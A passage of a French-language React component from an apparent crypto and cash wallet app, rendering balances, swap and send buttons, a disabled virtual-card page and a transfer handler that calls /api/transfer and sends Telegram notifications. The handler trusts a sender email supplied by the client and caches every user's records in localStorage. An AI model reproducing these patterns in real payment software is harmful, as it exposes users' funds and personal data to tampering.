          {/* Solana - DERNIÈRE LIGNE SANS TRAIT */}
          <div className="relative px-5 py-5 flex items-center justify-between">
            <div className="flex items-center gap-4">
              {/* Icône vide - tu ajouteras le logo */}
              <div className="w-12 h-12 rounded-full flex-shrink-0 overflow-hidden">
                <img src={solanaLogo} alt="Solana" className="w-12 h-12 object-cover" />
              </div>
              <div>
                <h4 className="text-white text-base font-semibold">Solana</h4>
              </div>
            </div>
            <div className="text-right">
              <p className="text-white text-lg font-bold">
                {userDetails?.cryptoWallet?.SOL ? 
                  convertCurrency(userDetails.cryptoWallet.SOL.balanceEUR, selectedCurrency).toLocaleString('fr-FR', {
                    minimumFractionDigits: 2,
                    maximumFractionDigits: 2
                  }) : '0,00'} {getCurrencySymbol(selectedCurrency)}
              </p>
              <p className="text-gray-400 text-sm">
                {userDetails?.cryptoWallet?.SOL?.balance || '0'} SOL
              </p>
            </div>
            {/* PAS DE TRAIT sur la dernière ligne */}
          </div>
          
        </div>
      </div>
    </div>
  </>
)}





 {activeTab === 'accounts' && (
          <div className="p-4 pb-24 pt-28"
               style={{
    transform: (showMenu || showWalletMenu) ? 'translateY(0px)' : `translateY(${pullDistance}px)`,
    transition: isRefreshing || pullDistance === 0 ? 'transform 0.3s ease' : 'none'
  }}
  onTouchStart={(showMenu || showWalletMenu) ? null : handleTouchStart}
  onTouchMove={(showMenu || showWalletMenu) ? null : handleTouchMove}
  onTouchEnd={(showMenu || showWalletMenu) ? null : handleTouchEnd}
 >
  {/* Spinner style iOS - comme votre capture */}
  {(isRefreshing || pullDistance > 30) && !showMenu && !showWalletMenu && (
  <div className="fixed top-24 left-1/2 transform -translate-x-1/2 z-50">
      <div className="relative w-6 h-6">
        {/* 8 barres en cercle comme iOS */}
        {Array.from({length: 8}).map((_, i) => (
          <div
            key={i}
            className="absolute w-0.5 h-2 bg-violet-400 rounded-full"
            style={{
              left: '50%',
              top: '0px',
              transformOrigin: '1px 12px',
              transform: `translateX(-50%) rotate(${i * 45}deg)`,
              opacity: 0.2 + (i * 0.1),
              animation: `spin-bars 1s linear infinite`,
              animationDelay: `${i * 0.125}s`
            }}
          />
        ))}
      </div>
    </div>
  )} 
            {/* Bouton Balance Total - CENTRÉ */}
<div className="flex justify-center mt-14 mb-2">
  <button 
    onClick={() => setShowCryptoDetails(true)}
    className="inline-flex items-center gap-2 bg-white/10 backdrop-blur-lg px-3 py-1.5 rounded-full"
  >
    <span className="text-white font-medium text-sm">Balance Total</span>
    <svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
      <polyline points="6 9 12 15 18 9"/>
    </svg>
  </button>
</div>

{/* Montant du solde */}
{/* Montant du solde */}
<div className="flex items-center justify-center mb-6">
  <h2 className="text-4xl font-bold text-white">
    {(() => {
      const cashBal = userDetails?.cashBalance || 0;
      const btc = userDetails?.cryptoWallet?.BTC?.balanceEUR || 0;
      const eth = userDetails?.cryptoWallet?.ETH?.balanceEUR || 0;
      const usdt = userDetails?.cryptoWallet?.USDT?.balanceEUR || 0;
      const sol = userDetails?.cryptoWallet?.SOL?.balanceEUR || 0;
      const total = cashBal + btc + eth + usdt + sol;
      return convertCurrency(total, selectedCurrency).toLocaleString('fr-FR', {
        minimumFractionDigits: 2, 
        maximumFractionDigits: 2
      });
    })()} {getCurrencySymbol(selectedCurrency)}
  </h2>
</div>

             {/* <button className="flex items-center gap-2 bg-black/40 backdrop-blur-lg px-3 py-2 rounded-lg">
                <div className="w-6 h-6 rounded-full bg-black flex items-center justify-center">
                  <span className="text-sm text-white">🏦</span>
                </div>
                <span className="text-sm text-white">Accounts</span>
              </button> */}
            
            {/* Espace flexible */}
<div className="flex-1" style={{ minHeight: '90px' }}></div>

{/* Bouton Importer un portefeuille */}
<div className="flex justify-center mb-4">
  <button 
    onClick={() => setShowWalletMenu(!showWalletMenu)}
    className="bg-black/40 backdrop-blur-lg px-6 py-3 rounded-xl text-white font-medium"
  >
    Importer un portefeuille
  </button>
</div>
     
            {/* Texte "Gagne 5% APY" */}
<div className="mb-2">
  <p className="text-white text-sm font-medium flex items-center gap-2">
    Gagne {(userDetails?.interestRate * 100) || 5}% APY
    <button className="w-4 h-4 rounded-full bg-white/20 flex items-center justify-center hover:bg-white/30 transition">
      <Info className="w-3 h-3" />
    </button>
  </p>
</div>            

            {/* Section Taux d'intérêt */}
            <div className="bg-white/10 backdrop-blur-lg rounded-xl p-4 mb-6">
              <div className="grid grid-cols-2 gap-4">
                <div>
                  <div className="text-3xl font-medium text-violet-300">
                {(userDetails?.interestRate * 100) || 5} %
                 </div>
                  <div className="text-sm text-gray-300">Taux d'intérêt</div>
                </div>
                <div>
                  <div className="text-3xl font-medium text-violet-300">
                 {userDetails?.monthlyInterest ? convertCurrency(userDetails.monthlyInterest, selectedCurrency).toLocaleString('fr-FR', {minimumFractionDigits: 2, maximumFractionDigits: 2}) : '0,00'} {getCurrencySymbol(selectedCurrency)}   
                 </div>
                  <div className="text-sm text-gray-300">Intérêts du mois</div>
                </div>
              </div>
            </div>
            

            {/* Boutons Swap et Envoyer - TAILLE RÉDUITE */}
<div className="grid grid-cols-2 gap-4 mb-3">
  {/* Bouton Swap */}
  <button 
    onClick={() => {
  setActiveTab('transfers');
  setShowSwapPage(true);
}}
    className="bg-white/10 backdrop-blur-sm rounded-2xl pt-3 px-3 pb-3 text-left relative overflow-hidden hover:bg-white/15 transition"
    style={{ minHeight: '160px' }}
  >
    <div className="flex justify-between items-start mb-0.5">
      <h3 className="text-lg font-semibold text-white">Swap</h3>
      <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2.5" className="text-gray-400">
        <path d="M5 12h14M12 5l7 7-7 7"/>
      </svg>
    </div>
    
    <p className="text-gray-300 text-xs mb-12">Échange instantané</p>
    
    <div className="absolute bottom-3 left-3 w-12 h-12 rounded-full bg-violet-600 flex items-center justify-center">
      <svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="white" strokeWidth="2.5" strokeLinecap="round" strokeLinejoin="round">
        <path d="M3 12a9 9 0 0 1 9-9 9.75 9.75 0 0 1 6.74 2.74L21 8"/>
        <path d="M21 3v5h-5"/>
        <path d="M21 12a9 9 0 0 1-9 9 9.75 9.75 0 0 1-6.74-2.74L3 16"/>
        <path d="M3 21v-5h5"/>
      </svg>
    </div>
  </button>
  
  {/* Bouton Envoyer */}
  <button 
    onClick={() => {
  setActiveTab('transfers');
  setShowCryptoWithdrawalPage(true);
}}
    className="bg-white/10 backdrop-blur-sm rounded-2xl pt-3 px-3 pb-3 text-left relative overflow-hidden hover:bg-white/15 transition"
    style={{ minHeight: '160px' }}
  >
    <div className="flex justify-between items-start mb-0.5">
      <h3 className="text-lg font-semibold text-white">Envoyer</h3>
      <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2.5" className="text-gray-400">
        <path d="M5 12h14M12 5l7 7-7 7"/>
      </svg>
    </div>
    
    <p className="text-gray-300 text-xs mb-12">Vers un wallet</p>
    
    <div className="absolute bottom-3 left-3 w-12 h-12 rounded-full bg-violet-600 flex items-center justify-center">
      <svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="white" strokeWidth="2.5" strokeLinecap="round" strokeLinejoin="round">
        <line x1="2" y1="8" x2="14" y2="8"/>
        <polyline points="6,4 2,8 6,12"/>
        <line x1="10" y1="16" x2="22" y2="16"/>
        <polyline points="18,12 22,16 18,20"/>
      </svg>
    </div>
  </button>
</div>

            {/* Section Transferts récents */}
<div className="mb-1">
  <div className="flex justify-between items-center mb-2">
    <h2 className="text-sm font-medium text-white">Transferts récents</h2>
    <button 
      onClick={() => {
        setActiveTab('transfers');
        setShowTransfersPage(true);
      }}
      className="text-violet-400 text-sm font-semibold hover:text-violet-300 transition"
    >
      Voir tout
    </button>
  </div>
  
  <div className="bg-white/10 backdrop-blur-lg rounded-2xl p-2.5 flex flex-col items-center justify-center" style={{ minHeight: '85px' }}>
    <div className="mb-1.5">
      <svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="#9CA3AF" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
        <line x1="2" y1="8" x2="14" y2="8"/>
        <polyline points="6,4 2,8 6,12"/>
        <line x1="10" y1="16" x2="22" y2="16"/>
        <polyline points="18,12 22,16 18,20"/>
      </svg>
    </div>
    <p className="text-white/60 text-center text-xs">
      Vos transferts apparaîtront ici
    </p>
  </div>
</div>

            {/* Bouton temporairement masqué
            <div className="flex justify-center">
              <div className="relative w-64">
                <button 
                  onClick={() => setShowMenu(!showMenu)}
                  className="w-full bg-black/40 backdrop-blur-lg px-4 py-3 rounded-xl text-white font-medium"
                >
                  Alimenter mon compte
                </button>
                </div> 
               </div>  
               */}

               

 </div> 
)}





              
          








      



        

        {activeTab === 'cards' && (
          <CardsComingSoonV2 userDetails={userDetails} />
        )}

 {false && ( // ANCIENNE PAGE CARDS - Changez false en true pour l'afficher
 <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white overflow-hidden h-screen p-4 pb-24">
    {/* En-tête */}
    <div className="flex justify-between items-center pt-20 px-4 pb-4"> 
      <div className="w-10 h-10">
        {/* Zone vide (X rouge dans votre maquette) */}
      </div>
      <button 
        onClick={() => setShowCardCreationModal(true)}
        className="bg-violet-400 text-white px-5 py-2 rounded-2xl font-medium shadow-md text-sm"
      >
        Créer une carte
      </button>
    </div>
    
    {/* Nom de l'utilisateur */}
    <div className="text-center mt-0 mb-4">
      <h2 className="text-xl font-medium">{userDetails?.fullName || "Utilisateur Name"}</h2>
    </div>
    
    {/* Carte Virtuelle - dans un conteneur limité en largeur */}
    <div className="px-5 mb-6">
      <div className="max-w-xs mx-auto">
        {showCardCreationModal ? (
          <div className="bg-gradient-to-b from-violet-900 to-black rounded-xl w-full h-48 shadow-lg flex flex-col justify-center items-center p-4">
            <div className="text-center space-y-2">
              <h2 className="text-lg font-bold text-white">Votre carte est en cours de création</h2>
              <p className="text-white/70 text-xs">Vous pourrez très prochainement la consulter et la gérer.</p>
            </div>
            
            <div className="mt-4">
              <button 
                onClick={() => setShowCardCreationModal(false)}
                className="px-6 py-1 text-center text-white font-semibold border border-white rounded-lg"
              >
                OK
              </button>
            </div>
          </div>
        ) : showCardSettings ? (
          <div className="bg-gradient-to-b from-violet-900 to-black rounded-xl w-full h-48 shadow-lg overflow-hidden">
            <div className="p-5">
              <h2 className="text-xl font-bold text-white mb-3">Limites</h2>
              
              <div className="mb-1">
                <p className="text-white/70 text-sm">Limite de paiements</p>
                <div className="flex items-baseline space-x-2">
                  <span className="text-2xl font-bold text-white">0 €</span>
                  <span className="text-white/70 text-sm">/ illimité</span>
                </div>
              </div>
              
              <div className="mt-3 w-full bg-white/20 rounded-full h-1.5">
                <div className="bg-violet-400 h-1.5 rounded-full w-0"></div>
              </div>
            </div>
          </div>
        ) : (
          <>
            <div className={`relative w-full h-48 rounded-xl overflow-hidden bg-gradient-to-br from-violet-500 to-violet-700 shadow-xl ${isCardBlocked ? 'blur-md' : ''}`}>
              <div className="absolute top-0 left-0 w-full h-full opacity-10 bg-[url('https://via.placeholder.com/400x250')] bg-cover bg-center"></div>
              
              {/* Reflet diagonal */}
              <div className="absolute top-0 left-0 w-full h-full bg-gradient-to-br from-transparent via-violet-400/30 to-transparent"></div>
              
              {/* Coin supérieur gauche - Virtual Card */}
              <div className="absolute top-3 left-3 bg-white/20 backdrop-blur-md px-2 py-0.5 rounded-md">
                <span className="text-white text-xs font-medium">Virtual Card</span>
              </div>
              
              {/* Coin supérieur droit - Logo HUST */}
              <div className="absolute top-3 right-3 bg-white px-2 py-0.5 rounded-sm">
                <span className="text-black font-bold text-xs italic">HUST</span>
              </div>
              
              {/* Numéro de carte */}
              <div className="absolute bottom-7 left-3">
                <span className="text-white text-base font-medium">••• 6115</span>
              </div>
              
              {/* Logo Visa */}
              <div className="absolute bottom-3 right-3">
                <span className="text-white text-xl font-bold italic">VISA</span>
                <div className="text-white/80 text-xs">Platinum Business</div>
              </div>
            </div>
            {isCardBlocked && (
              <div className="mt-2 text-center">
                <span className="inline-block px-3 py-1 bg-red-500 text-white text-xs rounded-full">Carte bloquée</span>
              </div>
            )}
          </>
        )}
       </div>
    </div>
    
    {/* Boutons d'action */}
    <div className="grid grid-cols-3 gap-4 px-5 mb-6 max-w-xs mx-auto">
      <button 
        onClick={() => setShowCardCreationModal(!showCardCreationModal)}
        className="flex flex-col items-center justify-center py-3 px-1 bg-black/40 backdrop-blur-md rounded-lg text-white w-full h-full"
      >
        <div className="text-lg">
          <svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <rect x="3" y="5" width="18" height="14" rx="2" />
            <line x1="3" y1="10" x2="21" y2="10" />
          </svg>
        </div>
        <span className="mt-1 text-xs">Voir détails</span>
      </button>
      <button 
        onClick={() => setShowCardSettings(!showCardSettings)}
        className="flex flex-col items-center justify-center py-3 px-1 bg-black/40 backdrop-blur-md rounded-lg text-white w-full h-full"
      >
        <div className="text-lg">
          <svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <path d="M12 15a3 3 0 1 0 0-6 3 3 0 0 0 0 6Z" />
            <path d="M19.4 15a1.65 1.65 0 0 0 .33 1.82l.06.06a2 2 0 0 1 0 2.83 2 2 0 0 1-2.83 0l-.06-.06a1.65 1.65 0 0 0-1.82-.33 1.65 1.65 0 0 0-1 1.51V21a2 2 0 0 1-2 2 2 2 0 0 1-2-2v-.09A1.65 1.65 0 0 0 9 19.4a1.65 1.65 0 0 0-1.82.33l-.06.06a2 2 0 0 1-2.83 0 2 2 0 0 1 0-2.83l.06-.06a1.65 1.65 0 0 0 .33-1.82 1.65 1.65 0 0 0-1.51-1H3a2 2 0 0 1-2-2 2 2 0 0 1 2-2h.09A1.65 1.65 0 0 0 4.6 9a1.65 1.65 0 0 0-.33-1.82l-.06-.06a2 2 0 0 1 0-2.83 2 2 0 0 1 2.83 0l.06.06a1.65 1.65 0 0 0 1.82.33H9a1.65 1.65 0 0 0 1-1.51V3a2 2 0 0 1 2-2 2 2 0 0 1 2 2v.09a1.65 1.65 0 0 0 1 1.51 1.65 1.65 0 0 0 1.82-.33l.06-.06a2 2 0 0 1 2.83 0 2 2 0 0 1 0 2.83l-.06.06a1.65 1.65 0 0 0-.33 1.82V9a1.65 1.65 0 0 0 1.51 1H21a2 2 0 0 1 2 2 2 2 0 0 1-2 2h-.09a1.65 1.65 0 0 0-1.51 1Z" />
          </svg>
        </div>
        <span className="mt-1 text-xs">Paramètres de ma carte</span>
      </button>
      <button 
        onClick={() => setIsCardBlocked(!isCardBlocked)}
        className="flex flex-col items-center justify-center py-3 px-1 bg-black/40 backdrop-blur-md rounded-lg text-white w-full h-full"
      >
        <div className="text-lg">
          <svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
            <rect x="3" y="11" width="18" height="11" rx="2" ry="2" />
            <path d="M7 11V7a5 5 0 0 1 10 0v4" />
          </svg>
        </div>
        <span className="mt-1 text-xs">{isCardBlocked ? "Débloquer" : "Bloquer"}</span>
      </button>
    </div>
    
    {/* Transactions liées */}
    <div className="px-5 mb-12">
  <div className="max-w-xs mx-auto bg-white rounded-xl overflow-hidden">
      <div className="p-3 border-b border-gray-200">
        <h3 className="text-base font-medium text-black">Transactions liées</h3>
      </div>
      <div className="p-8 flex items-center justify-center text-gray-500">
        <p className="text-sm">Pas de transaction pour cette carte</p>
      </div>
      <div className="border-t border-gray-200 py-2 px-3">
        <button 
          className="w-full text-center text-black font-medium text-sm"
          onClick={() => setShowAllTransactions(true)}
        >
          Tout afficher
        </button>
      </div>
    </div>
  </div>
  
    {/* Espace vide pour laisser de la place à la barre de navigation */}
    <div className="h-20"></div>
    
    {/* Modal pour toutes les transactions */}
    {showAllTransactions && (
      <div className="fixed inset-0 bg-black/80 backdrop-blur-sm z-50 flex items-center justify-center">
        <div className="bg-white rounded-xl w-full h-full max-w-full max-h-full flex flex-col">
          <div className="pt-12 px-4 pb-4 border-b border-gray-200 flex items-center">
            <button 
              onClick={() => setShowAllTransactions(false)}
              className="text-gray-500 mr-4"
            >
              <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
                <line x1="18" y1="6" x2="6" y2="18" />
                <line x1="6" y1="6" x2="18" y2="18" />
              </svg>
            </button>
            <h3 className="text-lg font-medium text-black">Transactions liées</h3>
          </div>
          
          <div className="flex-1 overflow-y-auto">
            {/* Message pas de transactions */}
            <div className="h-full flex items-center justify-center p-6">
              <p className="text-gray-500">Pas de transaction pour cette carte</p>
            </div>
          </div>
        </div>
      </div>
    )}
    
    {/* Modal pour les détails de la carte */}
    {showCardDetails && (
      <div className="fixed inset-0 bg-black/80 backdrop-blur-sm z-50 flex items-center justify-center p-4">
        <div className="bg-gray-900 rounded-xl max-w-md w-full p-4">
          <div className="flex justify-between items-center mb-6">
            <h3 className="text-xl font-bold">Détails de la carte</h3>
            <button 
              onClick={() => setShowCardDetails(false)}
              className="text-gray-400 hover:text-white"
            >
              <svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
                <line x1="18" y1="6" x2="6" y2="18" />
                <line x1="6" y1="6" x2="18" y2="18" />
              </svg>
            </button>
          </div>
          
          <div className="space-y-4">
            <div>
              <label className="text-gray-400 text-sm">Numéro de carte</label>
              <div className="flex justify-between items-center mt-1">
                <div className="text-xl font-mono">4539 •••• •••• 6115</div>
                <button className="text-violet-400">
                  <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
                    <rect x="9" y="9" width="13" height="13" rx="2" ry="2" />
                    <path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1" />
                  </svg>
                </button>
              </div>
            </div>
            
            <div className="grid grid-cols-2 gap-4">
              <div>
                <label className="text-gray-400 text-sm">Date d'expiration</label>
                <div className="mt-1 text-lg">12/27</div>
              </div>
              <div>
                <label className="text-gray-400 text-sm">CVV</label>
                <div className="flex justify-between items-center mt-1">
                  <div className="text-lg">•••</div>
                  <button className="text-violet-400">
                    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
                      <path d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z" />
                      <circle cx="12" cy="12" r="3" />
                    </svg>
                  </button>
                </div>
              </div>
            </div>
            
            <div>
              <label className="text-gray-400 text-sm">Titulaire</label>
              <div className="mt-1 text-lg">{userName.toUpperCase()}</div>
            </div>
            
            <button 
              onClick={() => setShowCardDetails(false)}
              className="w-full mt-4 bg-violet-600 hover:bg-violet-700 text-white py-3 rounded-lg transition-colors"
            >
              Fermer
            </button>
          </div>
        </div>
      </div>
    )}
  </div>
)}

{activeTab === 'transfers' && (
  <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white overflow-hidden h-screen p-4 pb-24">
    {showAmountPage ? (
      <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white">
        {/* Header */}
        <div className="pt-12 px-4 pb-4">
          <button className="text-white" onClick={() => setShowAmountPage(false)}>
            <ArrowLeft size={24} />
          </button>
        </div>
        
        {/* Montant entré */}
        <div className="flex justify-center items-center my-12">
          <div 
            className="flex items-center relative cursor-text"
            onClick={(e) => {
              const rect = e.currentTarget.getBoundingClientRect();
              const clickX = e.clientX - rect.left;
              const totalWidth = rect.width;
              setCursorPosition(clickX < totalWidth / 2 ? 'before' : 'after');
            }}
          >
            {cursorPosition === 'before' && (
              <span className="text-6xl font-light absolute left-0 w-0.5 h-12 bg-white animate-pulse"></span>
            )}
            <span className={`text-6xl font-light ${!isAmountValid ? 'text-red-500' : ''} px-1`}>{amount}</span>
            {cursorPosition === 'after' && (
              <span className="text-6xl font-light absolute right-12 w-0.5 h-12 bg-white animate-pulse"></span>
            )}
            <span className="text-6xl font-light ml-8">{getCurrencySymbol(selectedCurrency)}</span>
          </div>
        </div>
        
        {/* Informations du portefeuille */}
        <div className="mx-auto max-w-xs bg-gray-800/50 backdrop-blur-sm p-3 rounded-lg text-center mb-8">
          <div className="text-white text-sm">HUST Balance</div>
          <div className="text-white text-sm" key={balanceRefreshKey}>
  {userDetails?.cashBalance ? convertCurrency(userDetails.cashBalance, selectedCurrency).toFixed(2).replace('.', ',') : '0,00'} {getCurrencySymbol(selectedCurrency)}
</div>
        </div>
        
        {/* Séparateur */}
        <div className="border-t border-gray-700 mx-4 mb-4"></div>
        
        {/* Bouton Envoyer */}
        <div className="px-4 mb-6">
          <button 
            className={`w-full ${isAmountValid ? 'bg-gradient-to-r from-violet-600 to-violet-400' : 'bg-gray-500'} text-white py-2.5 rounded-lg font-medium`}
            onClick={() => setShowConfirmation(true)}
            disabled={!isAmountValid}
          >
            Envoyer
          </button>
        </div>
        
        {/* Clavier numérique */}
        {showKeypad && (
          <div className="grid grid-cols-3 gap-2 px-4 pb-16">
            {[1, 2, 3, 4, 5, 6, 7, 8, 9, ',', 0, 'backspace'].map((key, index) => (
              <button
                key={index}
                className="h-11 w-full flex items-center justify-center text-lg font-light"
                onClick={() => handleKeyPress(key === 'backspace' ? 'backspace' : String(key))}
              >
                {key === 'backspace' ? (
                  <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
                    <path d="M21 4H8l-7 8 7 8h13a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2z"></path>
                    <line x1="18" y1="9" x2="12" y2="15"></line>
                    <line x1="12" y1="9" x2="18" y2="15"></line>
                  </svg>
                ) : (
                  key
                )}
              </button>
            ))}
          </div>
        )}
        
        {/* Espace vide en bas de page */}
        <div className="h-52"></div>
        
        {/* Fenêtre de confirmation */}
        {showConfirmation && isAmountValid && (
          <div className="fixed inset-0 bg-black/80 backdrop-blur-sm flex justify-center items-center z-50">
            <div className="bg-gray-900 rounded-xl p-8 w-5/6 max-w-md flex flex-col items-center">
              {/* Logo avec animation de scintillement radial */}
              <div className="relative w-24 h-24 mb-6 flex items-center justify-center">
                {/* Cercles d'animation */}
                {animationActive && (
                  <>
                    <div className="absolute inset-0 rounded-full bg-violet-500 animate-ping opacity-30" 
                         style={{animationDuration: '1.5s'}}></div>
                    <div className="absolute inset-2 rounded-full bg-violet-500 animate-ping opacity-50" 
                         style={{animationDuration: '1.2s', animationDelay: '0.3s'}}></div>
                  </>
                )}
                
                {/* Cercle principal fixe */}
                <div className="absolute inset-3 bg-violet-500 rounded-full flex items-center justify-center">
                  <svg width="36" height="36" viewBox="0 0 24 24" fill="none" stroke="white" strokeWidth="3" strokeLinecap="round" strokeLinejoin="round">
                    <polyline points="20 6 9 17 4 12"></polyline>
                  </svg>
                </div>
              </div>
              
              {/* Texte de confirmation qui change */}
              <h2 className="text-2xl font-medium text-white mb-8">
                {confirmationState === 'sending' ? 'En cours d\'envoi' : 'Envoyé'}
              </h2>
              
              {/* Bouton de retour */}
              <button 
                className="w-full bg-violet-500 text-white py-3 rounded-lg"
                onClick={async () => {
                // Déduire l'argent du solde
    const amountToDeduct = parseFloat(amount.replace(',', '.'));
    
 
    

    // Déterminer le type de virement et préparer les détails
    let transferType, recipient, transferDetails = {};
      
    if (showHustPage) {
      transferType = 'hust';
      recipient = beneficiaryName;
        
      // TRANSFERT AUTOMATIQUE HUST
      const allUsersForTransfer = JSON.parse(localStorage.getItem('allUsers')) || {};
      const recipientUser = Object.values(allUsersForTransfer).find(user =>
        user.fullName && user.fullName.toLowerCase() === beneficiaryName.toLowerCase()
      );
    
      if (recipientUser) {
    
        
        
        // 🆕 ENVOYER AU SERVEUR IMMÉDIATEMENT
        try {
            console.log('🔵 ========== AVANT APPEL API ==========');
console.log('🔵 SERVER_URL:', SERVER_URL);
console.log('🔵 URL complète:', `${SERVER_URL}/api/transfer`);
console.log('🔵 userDetails.email:', userDetails.email);
console.log('🔵 recipientUser.email:', recipientUser.email);
console.log('🔵 amount:', amountToDeduct);       
           
            const transferResponse = await fetch(`${SERVER_URL}/api/transfer`, {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({
              senderEmail: userDetails.email,
              recipientEmail: recipientUser.email,
              amount: amountToDeduct,
              type: 'hust',
              details: { recipient: beneficiaryName }
            })
          });
          
          console.log('🔵 ========== RÉPONSE REÇUE ==========');
console.log('🔵 Status:', transferResponse.status);
console.log('🔵 Status Text:', transferResponse.statusText);
console.log('🔵 OK:', transferResponse.ok);

          const transferResult = await transferResponse.json();

          console.log('🔵 transferResult COMPLET:', transferResult);
console.log('🔵 transferResult.success:', transferResult.success);
console.log('🔵 transferResult.error:', transferResult.error);          

          if (transferResult.success) {
  console.log('🟢 ========== DÉBUT TRANSFERT RÉUSSI ==========');
  console.log('🟢 Ancien solde (userDetails):', userDetails.cashBalance);
  console.log('🟢 Nouveau solde (serveur):', transferResult.sender.cashBalance);
  console.log('🟢 Objet complet du serveur:', transferResult.sender);
  
  // Mettre à jour avec les VRAIES données du serveur
  console.log('🟢 AVANT setUserDetails');
  setUserDetails({...transferResult.sender});
  console.log('🟢 APRÈS setUserDetails');
  
  setTimeout(() => {
    console.log('🟢 AVANT setBalanceRefreshKey');
    setBalanceRefreshKey(prev => prev + 1);
    console.log('🟢 APRÈS setBalanceRefreshKey');
  }, 50);                  
  
  // Mettre à jour localStorage avec les données serveur
  const allUsersUpdated = JSON.parse(localStorage.getItem('allUsers')) || {};
  allUsersUpdated[userDetails.email.toLowerCase()] = transferResult.sender;
  allUsersUpdated[recipientUser.email.toLowerCase()] = transferResult.recipient;
  localStorage.setItem('allUsers', JSON.stringify(allUsersUpdated));
  console.log('🟢 localStorage mis à jour');
  
  console.log('✅ Serveur mis à jour, débit enregistré');
  console.log('🟢 ========== FIN TRANSFERT RÉUSSI ==========');

}     
} catch (error) {
  console.error('❌ Erreur envoi serveur:', error);
}

       // Sauvegarde hybride destinataire
       // await updateUserHybrid(recipientEmail, allUsersForTransfer[recipientEmail]);

        // Notification Telegram TRAITÉ
        await sendTransferNotification({
          type: 'hust',
          amount: amountToDeduct,
          from: userDetails?.fullName,
          to: beneficiaryName,
          status: 'processed'
        });
      
        
      } else {
      // Si pas trouvé dans localStorage, chercher sur serveur local
      const serverResult = await getAllUsersFromLocal();
      if (serverResult.success && serverResult.users) {
        const serverRecipientUser = Object.values(serverResult.users).find(user =>
          user.fullName && user.fullName.toLowerCase() === beneficiaryName.toLowerCase()
        );
        
        if (serverRecipientUser) { 
          
          
   
          
          // 🆕 ENVOYER AU SERVEUR IMMÉDIATEMENT (CAS SERVEUR LOCAL)
          try {
            
  console.log('🔵 ========== AVANT APPEL API (CAS 2) ==========');
  console.log('🔵 SERVER_URL:', SERVER_URL);
  console.log('🔵 serverRecipientUser.email:', serverRecipientUser.email);
             
              const transferResponse = await fetch(`${SERVER_URL}/api/transfer`, {
              method: 'POST',
              headers: { 'Content-Type': 'application/json' },
              body: JSON.stringify({
                senderEmail: userDetails.email,
                recipientEmail: serverRecipientUser.email,
                amount: amountToDeduct,
                type: 'hust',
                details: { recipient: beneficiaryName }
              })
            });
            
            console.log('🔵 ========== RÉPONSE REÇUE (CAS 2) ==========');
    console.log('🔵 Status:', transferResponse.status);
    console.log('🔵 transferResponse.ok:', transferResponse.ok);

            const transferResult = await transferResponse.json();

            console.log('🔵 transferResult:', transferResult);
    console.log('🔵 transferResult.success:', transferResult.success);            

            if (transferResult.success) {
              // Mettre à jour avec les VRAIES données du serveur
              setUserDetails({...transferResult.sender});
              setTimeout(() => {
  setBalanceRefreshKey(prev => prev + 1);
}, 50);
              
              // Mettre à jour localStorage avec les données serveur
              const allUsersUpdated = JSON.parse(localStorage.getItem('allUsers')) || {};
              allUsersUpdated[userDetails.email.toLowerCase()] = transferResult.sender;
              allUsersUpdated[serverRecipientUser.email.toLowerCase()] = transferResult.recipient;
              localStorage.setItem('allUsers', JSON.stringify(allUsersUpdated));
              
              console.log('✅ Serveur mis à jour (cas serveur local), débit enregistré');
       
            }
          } catch (error) {
            console.error('❌ Erreur envoi serveur (cas serveur local):', error);
          }
          
          // await updateUserHybrid(serverRecipientUser.email, allUsers[serverRecipientUser.email.toLowerCase()]);

          await sendTransferNotification({
            type: 'hust',
            amount: amountToDeduct,
            from: userDetails?.fullName,
            to: beneficiaryName, 
            status: 'processed' 
          });
          
      
        }
      }
    }
  }     
    else if (showBankPage) {
      transferType = 'bank';
          
      // RÉCUPÉRER LES DÉTAILS BANCAIRES
      transferDetails = {
        currency: currency || 'EUR - Euro',
        name: `${userDetails?.firstName || ''} ${userDetails?.lastName || ''}`.trim(),
        iban: bankAccount || '',
        bic: bicCode || ''
      };
      
      // 🆕 APPELER LE SERVEUR POUR DÉBITER
  try {
    const transferResponse = await fetch(`${SERVER_URL}/api/transfer`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        senderEmail: userDetails.email,
        recipientEmail: null,  // Pas de destinataire pour virement bancaire
        amount: amountToDeduct,
        type: 'bank',
        details: transferDetails
      })
    });
    
    const transferResult = await transferResponse.json();
    
    if (transferResult.success) {
      // Mettre à jour avec les données du serveur
      setUserDetails({...transferResult.sender});
      
      // Mettre à jour localStorage
      const allUsersUpdated = JSON.parse(localStorage.getItem('allUsers')) || {};
      allUsersUpdated[userDetails.email.toLowerCase()] = transferResult.sender;
      localStorage.setItem('allUsers', JSON.stringify(allUsersUpdated));
      
      console.log('✅ Virement bancaire traité, débit enregistré');      
    
